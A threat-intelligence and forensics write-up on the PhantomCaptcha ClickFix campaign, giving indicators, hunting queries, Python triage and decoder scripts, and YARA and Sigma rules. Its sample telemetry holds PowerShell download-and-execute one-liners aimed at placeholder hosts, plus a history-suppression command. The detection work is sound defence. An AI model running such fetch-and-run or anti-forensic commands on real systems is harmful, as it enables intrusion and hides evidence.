PhantomCaptcha: WebSocket RAT over ClickFix — Practitioner Notes, Artifacts, and Detections
In a report published October 22, 2025, SentinelLabs documented a single-day spearphishing operation dubbed “PhantomCaptcha” that targeted Ukraine-linked NGOs and regional government staff. The chain blends a fake Cloudflare CAPTCHA with a ClickFix/Paste‑and‑Run prompt that executes staged PowerShell, culminating in a WebSocket-based RAT that uses JSON tasking. The campaign’s notable indicators include the lure domain zoomconference[.]app, the backend C2 bsnowcommunications[.]com, an embedded XOR key, and explicit attempts to suppress PowerShell history. (SentinelLabs report). (sentinelone.com)
Why it matters to DFIR
- It’s a social-engineering-heavy initial access where users self-execute the payload (ClickFix), bypassing file-centric controls. (Proofpoint background on ClickFix/Paste‑and‑Run). (proofpoint.com)
- Final C2 runs over WebSocket from a web origin; after the HTTP Upgrade it looks like a long-lived web session, which defeats proxy/IDS heuristics tuned to request/response patterns. It maps to ATT&CK T1071.001 Web Protocols. (MITRE ATT&CK T1071; PT Security’s ATT&CK mirror noting WebSocket under web traffic). (attack.mitre.org)
- The actor disables PSReadLine’s history file, degrading a common host artifact unless you’ve instrumented Script Block/Module logging and/or transcription. (Set‑PSReadLineOption HistorySaveStyle; Mandiant/Google on PowerShell logging EIDs). (jdocs.mdbgo.io)
Attack chain (condensed)
- Spearphishing email with a PDF that links to zoomconference[.]app, presenting a fake Cloudflare challenge. Clicking leads to a popup instructing “Copy token” then Win+R paste to run. (SentinelLabs; ATT&CK T1566.001/002). (sentinelone.com)
- The button places a command on clipboard that launches PowerShell headlessly via conhost.exe, fetching a stage from /cptch/${clientId}. (SentinelLabs). (sentinelone.com)
- Stage 1: large obfuscated PowerShell “cptch” downloader; core behavior = fetch next stage. Stage 2: “maintenance” collects host identifiers, XOR‑encodes with a hardcoded key, disables PSReadLine history, and retrieves Stage 3. Stage 3: a PowerShell RAT maintaining a WebSocket connection to bsnowcommunications[.]com, exchanging Base64‑encoded JSON tasks with keys like “cmd” and “psh”. (SentinelLabs). (sentinelone.com)
Artifacts you can pull today
- Email and doc lure
- PDF SHA‑256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3; link to zoomconference[.]app. (SentinelLabs). (sentinelone.com)
- ATT&CK mapping: T1566.001 Spearphishing Attachment; T1566.002 Spearphishing Link. (ATT&CK; ATT&CK). (attack.mitre.org)
- Staging and payloads
- Stage 1 “cptch” downloader SHA‑256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44. (SentinelLabs). (sentinelone.com)
- Stage 2 “maintenance” SHA‑256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566; XOR key: b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l; disables history via Set‑PSReadLineOption -HistorySaveStyle SaveNothing. (SentinelLabs; Set‑PSReadLineOption docs). (sentinelone.com)
- Stage 3 RAT SHA‑256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23; WebSocket C2: wss://bsnowcommunications[.]com:80; JSON tasking keys: cmd, psh. (SentinelLabs). (sentinelone.com)
- Infrastructure
- Lure: zoomconference[.]app → 193.233.23[.]81 (KVMKA hosting); backend C2: bsnowcommunications[.]com → 185.142.33[.]131. (SentinelLabs). (sentinelone.com)
- Local host artifacts (Windows)
- PSReadLine history file (if not suppressed): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help reference). (artefacts.help)
- PSReadLine option state:
(Get-PSReadLineOption).HistorySaveStyle and HistorySavePath (PowerShell 5.1+ with PSReadLine loaded). Set‑PSReadLineOption only changes the running session, so a SaveNothing value on a live host reflects that session only; on a dead box, check the $PROFILE scripts for a persisted copy of the command instead. (Microsoft Learn Get‑PSReadLineOption). (learn.microsoft.com)
Detection and hunting tips
- Process execution
- Look for conhost.exe spawning powershell.exe (the lure's conhost.exe --headless launch) with hidden-window flags and an inline download-and-execute sequence. Pasted one-liners usually use the short forms (-w h, iex, iwr), so do not key only on the long parameter names.
// MDE: conhost -> powershell chain with clipboard-style payloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe","pwsh.exe")
| where InitiatingProcessFileName =~ "conhost.exe" or InitiatingProcessCommandLine has "headless"
| where ProcessCommandLine has_any ("DownloadString","DownloadFile","Invoke-Expression","iex","iwr")
| where ProcessCommandLine matches regex @"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b" or InitiatingProcessCommandLine has "headless"
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine
- Detect Set‑PSReadLineOption disabling history. If Script Block Logging is on, Event ID 4104 captures the script block text; Module logging produces 4103. MDE's PowerShellCommand ActionType records the cmdlets it observed; for the full 4104 body, search the forwarded PowerShell Operational log (ScriptBlockText) for the same strings. (Mandiant/Google; Windows PowerShell Script Block Logging policy). (cloud.google.com)
// MDE: PowerShell command telemetry containing SaveNothing
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType == "PowerShellCommand"
| where AdditionalFields has "Set-PSReadLineOption" and AdditionalFields has "SaveNothing"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, AdditionalFields
- Network and WebSocket
- Alert on outbound WebSocket (ws/wss) to non-standard ports or rare FQDNs; flag bsnowcommunications[.]com and wss to TCP/80 in particular. Endpoint network telemetry records the TCP connection, not the HTTP Upgrade, so the wss scheme and the Upgrade: websocket header are only visible in proxy or TLS-inspection logs; pair the endpoint query with proxy data. Map to ATT&CK T1071.001. (ATT&CK; PT Security ATT&CK mirror noting WebSocket). (attack.mitre.org)
// MDE: PowerShell reaching the C2 domain/IP, or any PowerShell connection to TCP/80
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where ActionType == "ConnectionSuccess"
| where RemoteUrl has "bsnowcommunications.com" or RemoteIP == "185.142.33.131"
    or (RemotePort == 80 and InitiatingProcessFileName in~ ("powershell.exe","pwsh.exe"))
| summarize dcount(DeviceId), make_set(RemoteUrl), make_set(RemoteIP), make_set(InitiatingProcessFileName) by bin(Timestamp, 1h)
- File/host IOCs
- Hunt for SHA‑256s listed above; validate downloads from /cptch/* and /maintenance endpoints where recorded by proxies. (SentinelLabs). (sentinelone.com)
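The process-execution and Set‑PSReadLineOption heuristics above, applied to host telemetry as an added example (not code from the SentinelLabs report, MDE, or Sigma). It runs the same checks over constructed process-creation and 4104-style records, handles the short forms (-w h, iex, iwr) and a conhost --headless parent, and expands -EncodedCommand payloads, which the report does not mention but ClickFix one-liners commonly use; hostnames, paths and URLs in the samples are placeholders.

```python
"""ClickFix -> PowerShell triage over host telemetry (added example; not from
the SentinelLabs report, MDE, or Sigma). Records are constructed to resemble
flattened process-creation events and PowerShell 4104 script block events.
-EncodedCommand expansion is a generalization the report does not describe."""
import base64
import binascii
import re
from typing import List, Optional

PS_IMAGES = ("powershell.exe", "pwsh.exe")
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod"
    r"|\b(?:iwr|irm|curl|wget)\b", re.I)
EXEC_RE = re.compile(r"invoke-expression|\biex\b", re.I)
# -WindowStyle Hidden and its short forms, or the lure's conhost --headless
HIDDEN_RE = re.compile(r"-(?:w|win|window|windowstyle)\s+h(?:idden)?\b|--headless", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
# 4104 splits large scripts into chunks, so match within each chunk's text.
SAVE_NOTHING_RE = re.compile(
    r"set-psreadlineoption\b.*?-historysavestyle\s+savenothing", re.I | re.S)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Expand a -EncodedCommand payload (Base64 of UTF-16LE), else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(ev: dict) -> List[str]:
    """Heuristic hits for one process-creation record (empty if not PowerShell)."""
    if basename(ev.get("image", "")) not in PS_IMAGES:
        return []
    cmd = ev.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded  # scan both
    hits = []
    if basename(ev.get("parent_image", "")) == "conhost.exe":
        hits.append("conhost_parent")
    if HIDDEN_RE.search(text) or "--headless" in ev.get("parent_command_line", ""):
        hits.append("hidden_window")
    if decoded is not None:
        hits.append("encoded_command")
    if DOWNLOAD_RE.search(text):
        hits.append("download")
    if EXEC_RE.search(text):
        hits.append("inline_exec")
    return hits


def verdict(hits: List[str]) -> str:
    """Download plus inline exec from a hidden/headless launch is the page's chain."""
    s = set(hits)
    if {"download", "inline_exec"} <= s and s & {"conhost_parent", "hidden_window"}:
        return "high"
    return "medium" if len(s) >= 2 else "none"


def history_suppressed(script_block_text: str) -> bool:
    """True when a 4104 chunk turns off PSReadLine history saving."""
    return SAVE_NOTHING_RE.search(script_block_text) is not None


def triage(process_events, script_blocks) -> List[dict]:
    alerts = []
    for ev in process_events:
        hits = score_process_event(ev)
        sev = verdict(hits)
        if sev != "none":
            alerts.append({"host": ev["host"], "kind": "clickfix_powershell",
                           "severity": sev, "hits": hits})
    for sb in script_blocks:
        if history_suppressed(sb["text"]):
            alerts.append({"host": sb["host"], "kind": "psreadline_history_suppressed",
                           "severity": "high", "hits": ["SaveNothing"]})
    return alerts


def encode_command(script: str) -> str:
    """What PowerShell expects after -EncodedCommand; used to build a sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry; hosts, paths and URLs are placeholders.
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS01", "parent_image": r"C:\Windows\System32\conhost.exe", "image": PS,
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                     "\"Invoke-Expression ((New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/cptch/abc'))\""},
    {"host": "WS02", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"host": "WS03", "parent_image": r"C:\Windows\System32\conhost.exe", "image": PS,
     "command_line": "powershell -w h -enc " + encode_command("iex (iwr http://example.invalid/cptch/x)")},
]
SAMPLE_SCRIPT_BLOCKS = [
    {"host": "WS01", "text": "Set-PSReadLineOption -HistorySaveStyle SaveNothing\n$x = 1"},
    {"host": "WS04", "text": "Set-PSReadLineOption -EditMode Emacs"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_SCRIPT_BLOCKS):
        print(alert)
```

Map your EDR's parent/image/command-line fields and the 4104 ScriptBlockText into the same record shape; the verdict is deliberately high only when download, inline execution and a hidden or headless launch all coincide, so a bare -NoProfile or an unattended -File run does not alert.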
Forensic workflow guidance
- Scope and preserve
- Acquire full disk and volatile memory on suspected workstations that accessed zoomconference[.]app on October 8–9, 2025; preserve enterprise proxy logs for those dates. (SentinelLabs timeline). (sentinelone.com)
- PowerShell evidence
- Even if HistorySaveStyle was set to SaveNothing, Script Block Logging (EID 4104) and Module Logging (EID 4103) can retain code bodies and pipeline details when properly configured. Consider enabling transcription to a write‑only share for future incidents. (Mandiant/Google; Windows policy references). (cloud.google.com)
- Default PSReadLine history file location (if not disabled): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help). (artefacts.help)
- Network corroboration
- Identify any wss:// traffic to bsnowcommunications[.]com:80 and requests to /cptch/* or /maintenance. Treat any Base64 JSON payloads with keys cmd/psh as high‑fidelity if decrypted/inspected. (SentinelLabs). (sentinelone.com)
- Memory analysis
- Inspect PowerShell runspaces and loaded scriptblocks in memory; look for WebSocket client usage and repeated reconnect loops consistent with a RAT.
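A decoder for the two payload formats that the attack chain and the network-corroboration step refer to: Stage 2's XOR-encoded host identifiers and Stage 3's Base64 JSON tasking with cmd/psh keys. This is an added example, not code from the SentinelLabs report or the actor's scripts. Only the XOR key and the task key names come from the report; it assumes Stage 2 applies repeating-key XOR followed by Base64 and that each WebSocket text frame carries Base64 of one UTF-8 JSON object, and the sample capture is constructed.

```python
"""Decoders for the PhantomCaptcha payload formats (added example; not from
the SentinelLabs report or the actor's scripts). Facts from the report: the
Stage 2 XOR key and the "cmd"/"psh" task keys. Assumed, not in the report:
Stage 2 layout is repeating-key XOR then Base64; each Stage 3 text frame is
Base64 of one UTF-8 JSON object."""
import base64
import json
from itertools import cycle
from typing import List, Optional, Tuple

STAGE2_XOR_KEY = b"b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l"  # from the report
TASK_KEYS = ("cmd", "psh")                            # from the report


def xor_with_key(data: bytes, key: bytes = STAGE2_XOR_KEY) -> bytes:
    """Repeating-key XOR. Symmetric, so one call both encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encode_stage2_blob(host_info: bytes) -> str:
    """XOR then Base64 (assumed Stage 2 layout); used here to build samples."""
    return base64.b64encode(xor_with_key(host_info)).decode("ascii")


def decode_stage2_blob(blob: str) -> bytes:
    """Reverse of encode_stage2_blob. With the key lifted from the script,
    the encoding gives the beacon no confidentiality at all."""
    return xor_with_key(base64.b64decode(blob, validate=True))


def parse_task_frame(frame: str) -> Optional[dict]:
    """Decode one captured frame. Returns the JSON object when it carries a
    cmd/psh task; None for bad Base64, non-JSON, non-objects or no task key
    (binascii.Error and JSONDecodeError both subclass ValueError)."""
    try:
        obj = json.loads(base64.b64decode(frame, validate=True).decode("utf-8"))
    except ValueError:
        return None
    if not isinstance(obj, dict) or not any(k in obj for k in TASK_KEYS):
        return None
    return obj


def extract_tasks(frames: List[str]) -> List[Tuple[int, str, str]]:
    """(frame index, task key, command) for every frame that parses as tasking."""
    found = []
    for i, frame in enumerate(frames):
        task = parse_task_frame(frame)
        if task is None:
            continue
        for key in TASK_KEYS:
            if key in task:
                found.append((i, key, str(task[key])))
    return found


def b64_json(obj) -> str:
    """Frame builder matching the assumed Stage 3 layout (for samples)."""
    return base64.b64encode(json.dumps(obj).encode("utf-8")).decode("ascii")


# Constructed sample capture, not real C2 traffic: two tasks, one control
# message without a task key, and one junk frame.
SAMPLE_FRAMES = [
    b64_json({"id": 1, "cmd": "whoami /all"}),
    b64_json({"id": 2, "psh": "Get-ChildItem $env:USERPROFILE\\Documents"}),
    b64_json({"id": 3, "type": "ping"}),
    "not-base64!!",
]
SAMPLE_HOST_INFO = b"host=WS01;user=jdoe;domain=CORP;id=ab12"  # constructed

if __name__ == "__main__":
    print(extract_tasks(SAMPLE_FRAMES))
    blob = encode_stage2_blob(SAMPLE_HOST_INFO)
    print(blob, "->", decode_stage2_blob(blob))
```

Feed it decrypted frames from a TLS-inspecting proxy or strings carved from PowerShell memory; anything that yields a cmd or psh task is the high-fidelity signal the network-corroboration step describes, and the XOR round trip shows why the beacon contents are recoverable once the key is known.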
Quick content matches (YARA/Sigma-style examples)
- YARA (Stage 2 XOR key string; the key is a literal in the script, so this matches the script on disk, in memory, or in 4104 script block text)
rule PhantomCaptcha_Stage2_XORKey
{
    meta:
        author = "DFIR"
        description = "Match the Stage 2 XOR key literal from PhantomCaptcha"
    strings:
        $k = "b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l" ascii wide
    condition:
        $k
}
- Sigma (process creation; conhost.exe is the parent and PowerShell the child; add the iex/iwr aliases to selection_cmd if your pipeline does not normalize command lines)
title: ClickFix Headless PowerShell Downloader Launched via conhost
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\conhost.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmd:
        CommandLine|contains|all:
            - 'DownloadString'
            - 'Invoke-Expression'
    selection_hidden:
        CommandLine|contains:
            - '-WindowStyle Hidden'
            - '-w h'
    condition: all of selection_*
level: medium
Hardening and response actions
- Block and monitor
- Add bsnowcommunications[.]com and zoomconference[.]app to blocklists, and monitor for lookalike registrations; SentinelLabs noted zoomconference[.]click in activity observed after the takedown. (SentinelLabs). (sentinelone.com)
- Alert on ws/wss traffic from endpoints where browsers are not expected to initiate persistent sockets outside sanctioned apps; prioritize non‑443 use. Map to ATT&CK T1071.001. (ATT&CK). (attack.mitre.org)
- PowerShell logging baseline
- Enable Script Block Logging and Module Logging via GPO/MDM; consider Transcription to a central write‑only share. (Windows policy CSP; Mandiant/Google guidance). (learn.microsoft.com)
- User comms and controls
- Educate users on “copy this token and paste into Run/PowerShell” lures; they are a current trend. (Proofpoint ClickFix analysis). (proofpoint.com)
Indicators (from reporting)
- Domains: zoomconference[.]app, bsnowcommunications[.]com. IPs: 193.233.23[.]81, 185.142.33[.]131. Paths: /cptch/${clientId}, /maintenance. Payload hashes provided above. (SentinelLabs). (sentinelone.com)
Takeaways
- Turn on PowerShell Script Block + Module Logging and consider Transcription now; create alerts for Set‑PSReadLineOption → SaveNothing.
- Hunt for conhost.exe → powershell.exe chains with DownloadString/Invoke‑Expression and hidden window flags.
- Monitor/deny outbound WebSocket C2 to unknown domains and non‑standard ports; watch for bsnowcommunications[.]com and successors.
- Pull enterprise proxy logs for October 8–9, 2025 to scope access to zoomconference[.]app and related pivots; acquire memory on suspected hosts.
- Push user messaging: never paste “tokens” into Run/PowerShell from web prompts; report such prompts immediately. (Proofpoint ClickFix). (proofpoint.com)
Sources / References
- SentinelLabs: PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine: https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/
- Proofpoint: From Clipboard to Compromise (ClickFix/Paste-and-Run): https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
- MITRE ATT&CK: T1566.001 Spearphishing Attachment: https://attack.mitre.org/techniques/T1566/001/
- MITRE ATT&CK: T1071 Application Layer Protocol: https://attack.mitre.org/techniques/T1071/
- PT Security ATT&CK mirror: T1071.001 Web Protocols (notes WebSocket): https://mitre.ptsecurity.com/en-US/T1071.001
- Mandiant/Google: Greater Visibility Through PowerShell Logging: https://cloud.google.com/blog/topics/threat-intelligence/greater-visibility
- Microsoft Learn: WindowsPowerShell Policy CSP (Script Block Logging): https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowspowershell
- Microsoft Learn: Get-PSReadLineOption: https://learn.microsoft.com/en-us/powershell/module/PSReadline/get-psreadlineoption?view=powershell-5.1
- artefacts.help: PowerShell ConsoleHost_history: https://artefacts.help/windows_powershell_consolehost_history.html